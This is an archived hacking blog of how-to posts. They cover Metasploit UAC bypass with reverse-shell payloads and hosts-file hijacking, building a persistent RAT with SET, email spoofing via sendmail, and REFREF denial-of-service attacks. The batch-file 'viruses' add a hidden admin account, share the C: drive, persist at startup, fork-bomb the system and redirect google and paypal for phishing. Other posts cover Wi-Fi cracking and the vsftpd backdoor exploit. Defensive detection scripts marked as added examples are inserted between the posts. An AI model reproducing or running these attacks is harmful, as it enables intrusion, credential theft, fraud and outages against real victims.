We are dealing with the best-educated generation in the world, but they have got brains dressed up with nowhere to go.

Friday, December 28, 2012

D.N.S. poisoning using metasploit.


Today we will edit the hosts file of a remote PC which has been compromised. By editing the hosts file you can redirect any website to any IP address. Of course, we will use Metasploit.
(1)Hack the remote PC. (How to hack a remote PC?)
(2)Now we will bypass the U.A.C. protection of Windows.
(3)Open a terminal and type the following commands
msfconsole
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
set session 1
exploit
(4)Now we will edit the hosts file.
msf >use post/windows/manage/injet_host
msf post(injet_host) >set domain www.google.com
msf post(injet_host) >set ip Your Desired I.P.
msf post(injet_host) >set session 2
msf post(injet_host) >exploit

This will redirect google.com on the victim's PC to your desired IP.

Monday, December 24, 2012

How to use R.A.T. through S.E.T?


A RAT is a Remote Administration Tool; using a RAT you can control a remote PC. There is lots of RAT software available, but it is made by hackers, so there is a possibility of a back-door in that readily available software. So today we use a RAT through the Social Engineering Toolkit (SET).
(1)Open your terminal and type
cd /opt/set
./set
(2)Update your SET.
(3)Now select option 3, which is Third Party Modules.
(4)Now select option 2, which is RATTE (Remote Administration Tool Tommy Edition).
(5)Enter the IP address of your computer to connect back.
(6)Port RATTE Server should listen on [8080]: press enter
(7)Should RATTE be persistent [no|yes]?:yes
(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe
(9) Payload has been exported to src/program_junk/ratteM.exe

Saturday, December 22, 2012

How to install & configure send mail in Ubuntu?


Sendmail is a program which helps you send email from the command line; you can send email from a terminal or CMD. In this setup we use our own machine as a server. I will show you how to install and configure Sendmail so we can spoof email to targets. The problem is that this email is detected as spam because it is sent automatically from a machine.

How to Install Send-Mail?
Open a terminal and type the following commands.
sudo apt-get install mailutils
sudo apt-get install sendmail

How to configure it?
After installing sendmail, you should configure it. It's a little hard, but don't worry, after that we can spoof email to anyone.
Type the following command in the terminal
sudo gedit /etc/mail/sendmail.mc
It will open the sendmail.mc file.
For example, your last two lines are as follows
MAILER(`local')dnl
MAILER(`smtp')dnl
Put this code before those two lines.
MAILER_DEFINITIONS
define(`SMART_HOST',`smtp.gmail.com')
OK, now close that file.
Now we will generate the configuration file from the .mc file, so type the following command in the terminal.
sudo bash -c 'cd /etc/mail/ && m4 sendmail.mc > sendmail.cf'
Now everything is complete. Try to send mail using the terminal, or use the Social Engineering Toolkit as I mentioned in a previous post.
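
Why mail sent this way is detected as spam, seen from the receiving side (an added example, not part of the original post): the receiving server records its SPF, DKIM and DMARC verdicts in an Authentication-Results header, and a filter can read them back. The authserv-id mx.example.test, the domains and both messages are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

TRUSTED_AUTHSERV = "mx.example.test"   # assumption: id of your own receiving MTA

def _domain(header_value):
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()

def spoof_indicators(raw_message):
    """Return the reasons to distrust the From: address of a received message."""
    msg = message_from_string(raw_message)
    results = {}
    for hdr in msg.get_all("Authentication-Results", []):
        authserv, _, body = hdr.partition(";")
        if authserv.strip().lower() != TRUSTED_AUTHSERV:
            continue                   # anyone can add this header before delivery
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", body.lower()):
            results.setdefault(method, verdict)
    reasons = ["%s=%s" % (m, results.get(m, "none"))
               for m in ("spf", "dkim", "dmarc") if results.get(m) != "pass"]
    from_dom, env_dom = _domain(msg["From"]), _domain(msg["Return-Path"])
    if from_dom != env_dom:
        reasons.append("from=%s envelope=%s" % (from_dom, env_dom))
    return reasons

# Constructed message: mail handed over by a desktop machine claiming a bank address.
SPOOFED = """\
Return-Path: <user@desktop.example.test>
Authentication-Results: mx.example.test;
 spf=softfail smtp.mailfrom=desktop.example.test;
 dkim=none; dmarc=fail header.from=bank.example
Authentication-Results: relay.invalid; spf=pass; dkim=pass; dmarc=pass
From: "Support" <support@bank.example>
Subject: constructed sample

Please log in.
"""
# Constructed message that passes every check and has aligned domains.
GENUINE = """\
Return-Path: <support@bank.example>
Authentication-Results: mx.example.test; spf=pass; dkim=pass; dmarc=pass
From: "Support" <support@bank.example>

Hello.
"""

if __name__ == "__main__":
    print(spoof_indicators(SPOOFED))
    print(spoof_indicators(GENUINE))
```

Only the header written by your own mail server is evaluated; the second header in the spoofed sample claims "pass" for everything and is ignored because its authserv-id is not the trusted one.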

Thursday, December 20, 2012

How to install social engineering toolkit(S.E.T.) in ubuntu?


The Social Engineering Toolkit is a cool tool which is found in BACKTRACK; it increases the power of Metasploit. If you are on a Linux system other than BACKTRACK, you can still install it, as shown here for UBUNTU.
The extra packages which are necessary to use SET effectively are as follows.
(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.
(2)Ettercap:- If you are on a network and want to attack the network, for example with a Man in the Middle attack or DNS poisoning, then you require it.
To install Ettercap, open a terminal and type the following command:-
sudo apt-get install ettercap
(3)Openjdk-6:- It's a necessary program to use SET. Just type the following command in a terminal
sudo apt-get install openjdk-6-jdk

Now open a terminal and change directory to /opt.
sudo bash
cd /opt
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
cd /opt/set
svn update
nano config/set_config

Monday, December 17, 2012

Download Free E-books about Hacking


Hello friends, if you want to learn more about hacking and computer security, you can comment here and put your email address in the comment box. I will send you different e-books about hacking and computer security.
The list of books is as follows.

(1)CEH(Certified Ethical Hackers)2010V6.
(2)Hacking Wireless Networks For Dummies.
(3)Gray hat hacking.
(4)Blind_SQLInjection.
(5)backtrack-4-assuring-security-by-penetration-testing.
(6)Collections of Ankit Fadia Hacking Book.
(7)Secrets of Reverse Engineering.
(8)Social Engineering toolkit
(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

Sunday, December 16, 2012

How to use REFREF?


As we know, in the past the famous hacktivist group Anonymous carried out a series of DDoS attacks on a number of websites such as PayPal, MasterCard and Visa. At that time they used the tool LOIC to take the websites down.
Although they succeeded in their project, some of the hackers were arrested later because of LOIC. So they decided to build a new weapon for DoS attacks.
It was REFREF. It is programmed in Perl, Java and Python.
But the main requirement is that the URL must be vulnerable to SQL injection. It means that if you find a website which is vulnerable to SQL injection, then by using this tool you can easily take the website down.
You can download the REFREF script from here.

How to use?
It's pretty simple. Just open a terminal, change the path and execute the script.
cd Downloads
perl refref.pl vulnerable URL

It will take the website down in a short time. This tool is very effective: a 17-second attack from a single machine resulted in a 42-minute outage on Pastebin.

Friday, December 14, 2012

Batch File Virus -4


@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >
%SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y
@ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>
nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All
Users\Start Menu\Programs\Startup\warnusr.vbs”
rem
***************************************************************************
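
The changes this script makes each leave a record in the Windows Security log when auditing is on: 4616 (system time changed), 4720 (user account created), 4732 (member added to a local group) and 5142 (network share added). The following correlation over those events is an added example, not part of the original post; the events, SIDs and record numbers are constructed, and the timestamps are simplified to plain ISO format.

```python
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"     # built-in Administrators group
MAX_GAP = 50                    # records allowed between creation and promotion
MAX_JUMP = timedelta(hours=1)   # tolerated clock adjustment

def correlate(events):
    """Return alerts for the clock, account and share changes described above."""
    alerts, created = [], {}
    # Order by record number: the script resets the clock, so timestamps lie.
    for e in sorted(events, key=lambda e: e["rec"]):
        eid, host = e["id"], e["host"]
        if eid == 4616:                                     # system time changed
            old = datetime.fromisoformat(e["PreviousTime"])
            new = datetime.fromisoformat(e["NewTime"])
            if abs(new - old) > MAX_JUMP:
                alerts.append(("clock-jump", host, e["NewTime"]))
        elif eid == 4720:                                   # user account created
            created[(host, e["TargetSid"])] = (e["TargetUserName"], e["rec"])
        elif eid == 4732 and e["TargetSid"] == ADMINS_SID:  # added to local admins
            hit = created.get((host, e["MemberSid"]))
            if hit and e["rec"] - hit[1] <= MAX_GAP:
                alerts.append(("new-account-made-admin", host, hit[0]))
        elif eid == 5142:                                   # network share added
            path = e["ShareLocalPath"].rstrip("\\")
            if len(path) == 2 and path.endswith(":"):       # whole drive, e.g. C:\
                alerts.append(("drive-root-shared", host, e["ShareName"]))
    return alerts

# Constructed events; SIDs and record numbers are made up for the example.
NEW_SID = "S-1-5-21-1111-2222-3333-1005"
SAMPLE = [
    {"rec": 901, "id": 4616, "host": "WS01",
     "PreviousTime": "2012-12-14T10:00:01", "NewTime": "2000-01-01T12:00:00"},
    {"rec": 902, "id": 4720, "host": "WS01",
     "TargetUserName": "Microsoft_support", "TargetSid": NEW_SID},
    {"rec": 903, "id": 4732, "host": "WS01",
     "TargetSid": ADMINS_SID, "MemberSid": NEW_SID},
    {"rec": 904, "id": 5142, "host": "WS01",
     "ShareName": "\\\\*\\system", "ShareLocalPath": "C:\\"},
    {"rec": 905, "id": 5142, "host": "WS01",
     "ShareName": "\\\\*\\docs", "ShareLocalPath": "C:\\Shared\\Docs"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE):
        print(alert)
```

These events are only written when the matching audit policy subcategories are enabled on the host.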

Wednesday, December 12, 2012

Batch File Virus -3

Most of you have heard about the word ‘fork()’, which is used to create a child process. Likewise, fork bombing is nothing but a program calling itself again and again in an infinite loop, making the system crash by popping up hundreds of windows on the screen.

@echo off
:loop
Explorer
Call fork.bat
Goto loop

Copy the above program, paste it into a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop; then the same batch file is called again, which in turn opens up multiple documents windows in a loop. It goes on calling itself again and again until the system crashes or hangs.

Tuesday, December 11, 2012

Batch file virus -2


Batch programming lets its programmers create custom viruses just by misusing the way commands work, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark side of batch by learning how commands are misused to create batch viruses.

Folder Replicator Virus:
Here is a simple batch virus that contains only 6 lines. It has the tendency to replicate itself again and again, and keeps on creating a folder with the same name until a user stops it.

1. Just open up a notepad, then copy and paste the code below
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop

2. Save it as a batch file with the extension .bat. Before doing that, you have to modify the code by replacing ‘username’ with the currently logged-in username.

3. Then run it on the Victims computer to infect it.

4. Anyhow, it doesn’t cause much harm, but replicates a folder inside a folder and goes on.
One more thing that you have to notice is that this will create a directory inside another directory with the same name, so it doesn’t look like crap, since everything resides inside one main directory; moreover, deleting the root directory will purge all the clumsy things done by this piece of code.

Monday, December 10, 2012

DNS poisoning using BATCH File


Batch file programming is the native programming offered by the Microsoft Windows Operating System. A batch file is created using any text editor such as Notepad, WordPad, WinWord and so on, and comprises a sequence of built-in commands used to perform frequently done tasks such as deleting a series of files of the same type or of different types, creating logs, clearing unwanted junk from your computer and even creating a batch VIRUS.

DNS poisoning:
A batch file can modify the transfer zones by editing the hosts.txt file that resides at ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it takes you to a malicious website instead of the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then stealing credentials.

1. Just open up a notepad, then copy and paste the code below
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
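
A defender-side check for the hosts-file redirection described in this post and in the Metasploit post above, as an added example that is not part of the original page: it parses a hosts file and reports every entry that is not in an approved baseline. The watched-domain list, the baseline and the sample file are constructed for the example.

```python
import ipaddress

# Domains the two posts redirect; extend with the sites your users log in to.
WATCHED = {"www.google.com", "www.paypal.com"}
LOOPBACK_OK = {"localhost"}

def parse_hosts(text):
    """Yield (line_no, ip, [names]) for each well-formed hosts entry."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()    # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # not an address: ignore the line
        if len(fields) > 1:
            yield no, ip, [n.lower().rstrip(".") for n in fields[1:]]

def audit(text, baseline=frozenset()):
    """Return (line, severity, name, ip) for entries outside the baseline."""
    findings = []
    for no, ip, names in parse_hosts(text):
        for name in names:
            if (str(ip), name) in baseline:
                continue                        # approved by the administrator
            if ip.is_loopback and name in LOOPBACK_OK:
                continue                        # stock localhost entries
            severity = "HIGH" if name in WATCHED else "REVIEW"
            findings.append((no, severity, name, str(ip)))
    return findings

# Constructed sample: a default file plus the two lines the batch file appends.
SAMPLE = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
10.199.64.66 www.google.com
10.199.64.67 www.paypal.com   # appended by the batch file
192.168.1.20 intranet.example.test
"""

if __name__ == "__main__":
    approved = {("192.168.1.20", "intranet.example.test")}
    for finding in audit(SAMPLE, baseline=approved):
        print("line %d [%s] %s -> %s" % finding)
```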

Saturday, December 8, 2012

How to scan web-server with Nikto?


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.
Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).
Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.
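
How "fairly obvious in log files" looks from the server side, as an added example that is not part of the original post: the scanner announces itself in the User-Agent header by default, and even with that changed, one client requesting many distinct paths that mostly return 404 stands out. The log lines, paths, addresses and thresholds are constructed for the example.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log format.
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" '
                  r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def find_scanners(lines, min_paths=5, min_404_ratio=0.8):
    """Return {ip: [reasons]} for clients whose traffic looks like a scan."""
    stats = defaultdict(lambda: {"n": 0, "404": 0, "paths": set(), "ua": False})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        s = stats[m["ip"]]
        s["n"] += 1
        s["404"] += m["status"] == "404"
        parts = m["req"].split()
        if len(parts) >= 2:
            s["paths"].add(parts[1])
        s["ua"] = s["ua"] or "nikto" in m["ua"].lower()
    found = {}
    for ip, s in stats.items():
        reasons = []
        if s["ua"]:
            reasons.append("user-agent")
        # A renamed user agent still leaves many distinct, mostly missing paths.
        if len(s["paths"]) >= min_paths and s["404"] / s["n"] >= min_404_ratio:
            reasons.append("404-sweep")
        if reasons:
            found[ip] = reasons
    return found

def _line(ip, path, status, ua):
    return ('%s - - [08/Dec/2012:10:00:00 +0000] "GET %s HTTP/1.1" %d 0 "-" "%s"'
            % (ip, path, status, ua))

# Constructed sample traffic (documentation IP ranges, made-up paths).
SCAN_UA = "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
PROBES = ["/cgi-bin/test.cgi", "/admin/", "/backup.zip", "/phpinfo.php", "/old/"]
SAMPLE = ([_line("203.0.113.7", p, 404, SCAN_UA) for p in PROBES]
          + [_line("203.0.113.7", "/", 200, SCAN_UA)]
          + [_line("198.51.100.9", p, 404, "Mozilla/5.0") for p in PROBES]
          + [_line("192.0.2.10", p, 200, "Mozilla/5.0") for p in ("/", "/about")])

if __name__ == "__main__":
    for ip, why in find_scanners(SAMPLE).items():
        print(ip, why)
```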

Tuesday, December 4, 2012

how to Browser Autopwn attack in metasploit?


In this article we will examine the effectiveness of the metasploit browser autopwn module. The basic idea behind the module is that it creates a web server on our local machine which contains different kinds of browser exploits. When the user opens the malicious link, the exploits start executing against the user's browser, and if one of the exploits is successful a meterpreter session will open.
In order to use this attack we have to open the metasploit framework and use the browser_autopwn module. In the next image you can see the available options and default settings for this module.



Monday, December 3, 2012

How to crack wi-fi password in ubuntu?


For this purpose we are going to use Ubuntu. First we have to install the aircrack program in the OS.
(1)Install aircrack
sudo apt-get install aircrack-ng

(2) You need to become root first. For this purpose type “su –“ and type your password.

(3)Now type the following command in a terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise for educational purposes. This time we will use the command:
Code:
# airodump-ng wlan0

How to exploit VSFTPD ?


VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is an FTP server that can be found in Unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure; however, a major incident happened in July 2011 when someone replaced the original version with a version that contained a backdoor. The backdoor exists in version 2.3.4 of VSFTPD and it can be exploited through metasploit.

So first we scan port 21 to see whether it is vsftpd 2.3.4 or not; for this purpose you can use nmap.
So let’s assume that we have scanned a host and discovered version 2.3.4 of VSFTPD running on the system.
We can open the metasploit framework in order to search for the vsftpd module.

As we can see, there is only one module that we can use. So we will start configuring the module appropriately. In the next screenshot you can see the configuration that we need to do for this exploit to be executed successfully.